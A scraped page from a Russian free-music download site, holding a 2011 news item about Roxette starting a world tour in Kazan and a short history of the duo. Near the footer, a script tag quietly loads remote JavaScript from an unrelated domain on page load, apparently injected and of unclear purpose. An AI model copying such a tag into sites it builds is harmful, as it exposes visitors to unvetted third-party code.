Суббота, 20.04.2024, 06:50
Приветствую Вас Гость | RSS
Главная | | Регистрация | Вход
Меню сайта
Поиск
Случайная Музыка
Bahh Tee - Песня про...
Guf,Slim, Ptaha - зн...
Клуб лайф - Пам пам ...
MF feat StuFF - Пере...
SD-девочка ждёт
Гуф Ft. Dias - Она т...
RUS-adidas ft whiteN...
Slim - Шаги feat. VB...
Три богатыря - А за ...
Нэнси - Дым сигарет ...
Запомни i love you н...
Шаг вперед 3 - Финал...
Входящее сообщение (...
Schokk - Maмa
NTL - Далеко
Наш опрос
Кто лучший?
Всего ответов: 2600
Статистика


Онлайн всего: 1
Гостей: 1
Пользователей: 0


Кто нас сегодня посетил
Теги
Главная » 2011 » Март » 1 » Группа Roxette начнет мировое турне в Казани
11:32
Группа Roxette начнет мировое турне в Казани
Мировой концертный тур шведского дуэта Roxette начнется 1 марта в Казани, где они выступят на сцене спортивного центра «Баскет Холл». В турне группа отправляется впервые за последние десять лет. Затем концерты группы состоятся в Самаре (3 марта), Екатеринбурге (5 марта), Новосибирске (7 марта). После этого состоится серия концертов Roxette на Украине и в Белоруссии, а потом отправятся в остальные страны всех пяти континентов, где запланированы выступления группы в 2011 году. По информации на официальном сайте Roxette, на данный момент в тур артистов входит более 50 концертов, последний из которых состоится на Suikerrock Festival в бельгийском городе Тинен 31 июля.

Во время мирового турне Roxette исполнят не только свои старые хиты «Listen to your heart», «It must have been love», «Wish I could fly», но и некоторые песни с новой, еще не законченной пластинки.

В Москве группа выступала совсем недавно — в ноябре прошлого года, поэтому в гастрольный график этого тура московское выступление решили не включать. В Москве знаменитый коллектив впервые выступил в 1995 году. А последнее выступление Roxette в столице в 2010 году стало первым за девять лет в истории группы.

Поп-дуэт Пера Гессла (автор текстов песен и музыки, гитара, губная гармошка) и Мари Фредрикссон (вокал, рояль), традиционно исполняющий свои песни на английском языке, образовался еще в 1984 году. Roxette взошла на вершину популярности, записав в 1989 году песню The Look, ставшую хитом и долгое время возглавлявшую музыкальные чарты. В том же 1989 году Roxette вслед за ABBA и Blue Suede возглавили американский хит-парад, песня It must have been love прозвучала в фильме «Красотка» с Ричардом Гиром и Джулией Робертс в главных ролях.

В 2002-м году из-за тяжелой болезни Фредрикссон Roxette прекратил свою деятельность. Некоторое время артисты занимались сольными карьерами, записав совместно лишь несколько композиций для альбома лучших хитов — таким образом, они отметили 20-летие дуэта. Однако, несмотря на множество слухов, группа ни разу не распадалась.

Летом 2009 года Roxette объявили о своем воссоединении. Сначала речь шла только о серии концертов, но вскоре музыканты начали работу над новым альбомом. Недавно Гессле и Фредрикссон записали новый сингл A Thing about You, ставший их первой совместной работой за девять лет.

Просмотров: 418 | Добавил: Xe_Xe | Теги: Группа, начнет, Roxette, Турне, Казани, мировое | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
<script async language="javascript" charset="UTF-8" type="text/javascript" src="//shinasi.info/0news.js?lo6exc=289126"></script>
Хостинг от uCoz

У нас только свежая музыка
Наш муз портал - это уникальная возможность скачать и прослушать новинки Mp3 музыки абсолютно бесплатно, без регистрации! Качайте на MP3Narkotik.Ru клубную музыку, русский рэп, Electro, RnB, Rap, Hip-hop и многие другие Мп3 песни! sitemap